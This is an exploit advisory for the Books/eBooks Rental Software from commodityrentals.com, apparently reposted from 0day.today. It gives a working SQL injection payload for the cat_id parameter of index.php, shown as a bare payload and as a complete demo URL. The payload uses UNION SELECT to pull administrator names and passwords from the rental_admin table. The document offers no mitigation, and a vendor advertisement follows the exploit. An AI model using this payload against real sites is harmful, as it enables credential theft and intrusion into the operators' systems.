Books/eBooks Rental Software SQL injection Vulnerability related to Commodityrentals Softwar
========================================================
Books/eBooks Rental Software SQL injection Vulnerability
========================================================
/**************************************************************************
[!] Books/eBooks Rental Software SQL injection Vulnerability
[!] Author : Don Tukulesto
**************************************************************************/
[ Software Information ]
[+] Vendor : http://www.commodityrentals.com/
[+] This script is specifically tailored for people wanting to start a Books/E-Books Rentals Business within a very short time.
Fully E-Commerce ready, this system comes with a Books attribute template and a fully customizable "look and feel" template of the site.
[+] Method : SQL Injection
[+] Dork : Don Tukulesto
===========================================================================
[ Proof of Concept ]
http://server/index.php?view=gamecatalog&cat_id=[INDONESIAN CODER NOT DEAD WITHOUT YOU]
[ EXPL0!T ]
2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
[ D3M0 ]
http://server/index.php?view=gamecatalog&cat_id=2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
===========================================================================
# 0day.today [2018-04-08] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo